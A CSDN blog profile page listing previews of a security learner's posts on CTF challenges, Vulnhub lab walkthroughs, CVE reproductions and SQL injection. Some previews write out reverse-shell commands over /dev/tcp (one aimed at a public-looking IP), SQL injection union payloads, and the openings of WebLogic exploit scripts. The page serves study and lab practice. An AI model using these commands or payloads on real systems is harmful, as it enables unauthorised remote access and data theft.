南人旧心1906
码龄8年
求更新 关注
提问 私信
  • 博客:208,677
    208,677
    总访问量
  • 72
    原创
  • 50
    粉丝
  • 18
    关注
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:北京市
加入CSDN时间: 2018-05-04
博客简介:

qq_42133828的博客

查看详细资料
个人成就
  • 获得115次点赞
  • 内容获得56次评论
  • 获得365次收藏
  • 代码片获得1,293次分享
  • 博客总排名859,361名
创作历程
  • 2篇
    2020年
  • 39篇
    2019年
  • 37篇
    2018年
成就勋章
TA的专栏
  • java
    2篇
  • mysql
    4篇
  • sql
    4篇
  • 密码学
    4篇
  • XSS
    1篇
  • sqlmap
    1篇
  • python爬虫
    8篇
  • 文件包含
    1篇
  • kali
    9篇
  • ubuntu
    2篇
  • ctf
    22篇
  • win服务器
    3篇
  • php
    1篇
  • web基础漏洞
    1篇
  • pikachu
    1篇
  • 渗透靶机学习
    6篇
  • 提权
    3篇
  • 漏洞学习
    4篇
  • weblogic
  • fastjson
    2篇

TA关注的专栏 0

TA关注的收藏夹 0

TA关注的社区 0

TA参与的活动 0

兴趣领域 设置
  • 网络空间安全
    系统安全web安全安全架构
创作活动更多

AI 镜像开发实战征文活动

随着人工智能技术的飞速发展,AI 镜像开发逐渐成为技术领域的热点之一。Stable Diffusion 3.5 FP8 作为强大的文生图模型,为开发者提供了更高效的图像生成解决方案。为了推动 AI 镜像开发技术的交流与创新,我们特此发起本次征文活动,诚邀广大开发者分享在 Stable Diffusion 3.5 FP8 文生图方向的实战经验和创新应用 本次征文活动鼓励开发者围绕 Stable Diffusion 3.5 FP8 文生图方向,分享以下方面的内容: 1. 技术实践与优化 - Stable Diffusion 3.5 FP8 模型架构解析与优化技巧 - 文生图生成效果的提升方法与技巧 - 模型部署与加速策略,例如使用 Hugging Face、Diffusers 等工具 - 针对特定场景(例如二次元、写实风)的模型微调与定制化开发 2. 应用场景探索 - Stable Diffusion 3.5 FP8 在不同领域的应用案例分享,例如游戏设计、广告创意、艺术创作等 - 利用 Stable Diffusion 3.5 FP8 实现图像编辑、图像修复、图像增强等功能的探索 - 结合其他 AI 技术(例如 NLP、语音识别)构建更强大的应用 3. 创新应用与思考 - 基于 Stable Diffusion 3.5 FP8 的创新应用场景设计 - AI 镜像开发的未来发展方向的思考与展望 - 对 AI 镜像开发伦理、安全等问题的探讨

24人参与 去参加
  • 最近
  • 文章
  • 专栏
  • 代码仓
  • 资源
  • 收藏
  • 关注/订阅/互动
更多
  • 最近

  • 文章

  • 专栏

  • 代码仓

  • 资源

  • 收藏

  • 关注/订阅/互动

  • 社区

  • 帖子

  • 问答

  • 课程

  • 视频

搜索 取消

BugkuCTF中套路满满的题-----------Trim的日记本

这道题目,说起来小编看到题目内容的时候,以为是一道sql注入
原创
博文更新于 2019.02.28 ·
2410 阅读 ·
0 点赞 ·
1 评论 ·
0 收藏

Digitalworld.local: JOY Vulnhub靶场题解

前期准备镜像下载https://www.vulnhub.com/entry/digitalworldlocal-joy,298/环境配置:在VM以net连接打开虚拟机使用的机器:攻击机:kali linux,ubuntu靶机:ip随配(192.168.119.137)渗透开始1.nmap发现主机,并扫描其ip信息nmap -A 192.168.119.1372.发现ftp相...
原创
博文更新于 2019.08.16 ·
1174 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

BugKu中套路满满的题-------速度要快

这一题,首先进入的界面只有一句话,我感觉你得快点!!!查看源码发现下面还有一句话: OK ,now you have to post the margin what you find(上面个这句话是说明需要有post提交,参数为margin)那就抓包试试,,当你抓包发送出去的时候,你会发现,他给你返回base64加密的flag,嘿嘿。。。解密提交后发现是错误的!!那就再...
原创
博文更新于 2018.12.09 ·
1755 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

centos linux7忘记root密码,进行密码重置

小编今天就忘记Linux root 用户的口令,下面就由小编来教教大家如果忘记root口令怎么办第1步:开机后在内核上按“e”。第二步:按e以后会进入内核启动页面,在linux16这行的后面输入“rd.break console=tty0”然后按“ctrl+x“如下图第3步:按完ctry+x 后进入到了系统的紧急求援模式,并依次输入下述指令修改密码:mount –o remount,rw /sysrootchroot /sysrootpasswd ...
原创
博文更新于 2020.07.06 ·
1118 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

Docker镜像服务器内编辑文件报错 bash: vim: command not found

小编今天在自己搭建的docker镜像服务器内,本来想修改一下服务器里面的某个配置文件的,但是,在编辑文件的过程中显示报错,具体显示如下:root@haha:/# nanobash: nano: command not foundroot@haha:/# picobash: pico: command not foundroot@haha:/# vibash: vi: command not foundroot@haha:/# vimbash: vim: command no
原创
博文更新于 2020.07.01 ·
954 阅读 ·
1 点赞 ·
1 评论 ·
1 收藏

CVE-2019-11043远程代码执行漏洞复现

CVE-2019-11043远程代码执行漏洞复现漏洞名称:php fastcgi 远程命令执行漏洞漏洞类型:远程代码执行漏洞漏洞危害:高危漏洞来源:https://www.nginx.com/blog/php-fpm-cve-2019-11043-vulnerability-nginx/公布时间:2019-10-28涉及应用版本:<7.1.33的PHP版本7.1.x...
原创
博文更新于 2019.11.02 ·
8500 阅读 ·
1 点赞 ·
0 评论 ·
6 收藏

AI:WEB:02靶场题解

AI:WEB:02靶场题解前期准备镜像下载https://www.vulnhub.com/entry/ai-web-2,357/环境配置:在VM以net连接打开虚拟机使用的机器:攻击机:kali linux靶机:ip随配(192.168.203.136)渗透开始1.nmap发现主机,并扫描其ip信息,nmap --script=vuln 192.168.203.136发现路...
原创
博文更新于 2019.09.19 ·
1424 阅读 ·
2 点赞 ·
4 评论 ·
4 收藏

DC靶场1-6

靶机下载:https://download.vulnhub.com/dc/环境配置:在VM以net连接打开虚拟机使用的机器:攻击机:kali linux 靶机:DC1,2,4,5,6(IP随配)DC11.nmap扫描端口nmap -sS -A 192.168.119.1352. 访问页面,收集信息http://192.168.119.135:80 ...
原创
博文更新于 2019.09.16 ·
3617 阅读 ·
0 点赞 ·
0 评论 ·
11 收藏

AI:Web-1靶场题解

AI:Web-1靶场题解前期准备镜像下载https://www.vulnhub.com/entry/ai-web-1,353/环境配置:在VM以net连接打开虚拟机使用的机器:攻击机:kali linux靶机:ip随配(192.168.119.139)渗透开始1.nmap发现主机,扫描路径nmap -A 192.168.119.139nikto -h http://19...
原创
博文更新于 2019.09.16 ·
849 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

kali安装教程及踩的坑

对于小编来说,这两天真真是非常难受的。一直以来,小编得kali都是很友爱的童鞋帮小编安装的,但是天道好轮回,终究还是轮到小编我了。且说,这两天小编都没怎么听课,每节课都带着笔记本,在老师的课堂上努力的安装着kali。最终,小编自觉能力有限,还是去找了非常友爱的童鞋,完成了此次2019年的kali安装。。。虽说,kali是童鞋安装的,但是踩坑的,小编我还是遇到不少。。。先来一波,正常的安装教...
原创
博文更新于 2019.09.14 ·
2190 阅读 ·
1 点赞 ·
0 评论 ·
10 收藏

靶机渗透学习----node1

靶机下载地址及安装环境靶机下载地址:https://www.vulnhub.com/entry/node-1,252/靶机环境:处于net网络下的VM虚拟机渗透实战攻击机:192.168.146.131靶 机:192.168.146.132(扫描后得到的)1.安装完后,由于不知道node靶机的地址,所以渗透第一步就是发现主机:1)使用nmap快速扫描,发现存活主机:...
原创
博文更新于 2019.08.08 ·
1287 阅读 ·
0 点赞 ·
1 评论 ·
3 收藏

Postgres漏洞复现

Postgres漏洞汇现CVE-2018-1058漏洞名称:远程代码执行漏洞漏洞类型:远程代码执行公布时间:2018-3-1涉及应用版本:PostgreSQLhttps://www.securityfocus.com/bid/103221针对操作系统:windows/linux/mac漏洞简介:拥有普通权限的psql用户可以创建恶意函数。在管理员使用某些工具的时候,就会...
原创
博文更新于 2019.07.21 ·
1108 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

fastjson复现

fastjson2017-0315远程代码执行漏洞复现漏洞名称:fastjson远程命令执行漏洞漏洞类型:远程代码执行漏洞漏洞危害:高危漏洞来源:https://github.com/alibaba/fastjson/wiki/security_update_20170315公布时间:2017-03-15涉及应用版本:fastjson小于1.2.24的所有版本poc适用于...
原创
博文更新于 2019.07.20 ·
2018 阅读 ·
3 点赞 ·
1 评论 ·
0 收藏

SQL注入知识汇总

SQL注入基础篇原理:SQL注入,意思就是指 输入一条SQL语句,插入到代码中,修改后台SQL语句,使程序执行,进而达到进行攻击的目的常用的SQL语句:选择(select)语句 select * from table_name更新(update)语句 update table_name set dump_name=vaule删除(delete)语句 delete from tabl...
原创
博文更新于 2019.07.19 ·
1006 阅读 ·
2 点赞 ·
0 评论 ·
6 收藏

weblogic CVE-2019-2725 pocsuite3的 poc

import refrom collections import OrderedDictfrom urllib.parse import urljoinfrom pocsuite3.api import Output,POCBase,register_poc,requests,logger,POC_CATEGORY,OptDictfrom pocsuite3.api import ge...
原创
博文更新于 2019.07.03 ·
2049 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

weblogic CVE-2019-2725 的一键脚本

# -*- coding: utf-8 -*-import requestsimport argparseclass Exploit: def __init__(self, rhost, lport, lhost): self.url=rhost self.lhost=lhost self.lport=lport def run(self): headers={ ...
原创
博文更新于 2019.07.03 ·
2398 阅读 ·
0 点赞 ·
3 评论 ·
0 收藏

常用的反弹shell的语句

shell编码:http://www.jackson-t.ca/runtime-exec-payloads.htmlbash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i >& /dev/tcp/65.49.135.12/8888 0>&1 &perl版本:...
原创
博文更新于 2019.07.03 ·
830 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

python多线程爬虫爬取喜马拉雅网页所有带id的音频

本学期python课程设计:设计流程图:代码实现:#-*-coding:utf-8-*-import requestsimport reimport osimport multiprocessingimport timefrom bs4 import BeautifulSoupdef save_path(): if os.path.exist...
原创
博文更新于 2019.07.03 ·
1553 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

pickachu漏洞学习---------sql注入篇

1.数字型注入(POST):源码:payload: -1' union select 1,2 #2.字符型注入(GET):源码:payload: 0'union select 1,database() #3.搜索型注入源码:payload: 0' union select 1,2,database() #...
原创
博文更新于 2019.06.23 ·
1224 阅读 ·
1 点赞 ·
1 评论 ·
2 收藏

靶机渗透学习----Billu_b0x

靶机下载地址及安装环境靶机下载地址:https://download.vulnhub.com/billu/靶机环境:处于net网络下的VM虚拟机渗透实战攻击机:192.168.146.131靶 机:192.168.146.133(扫描后得到的)1.安装完后,由于不知道node靶机的地址,所以渗透第一步就是发现主机:1)使用nmap快速扫描,发现存活主机:nma...
原创
博文更新于 2019.06.07 ·
3078 阅读 ·
2 点赞 ·
0 评论 ·
15 收藏
加载更多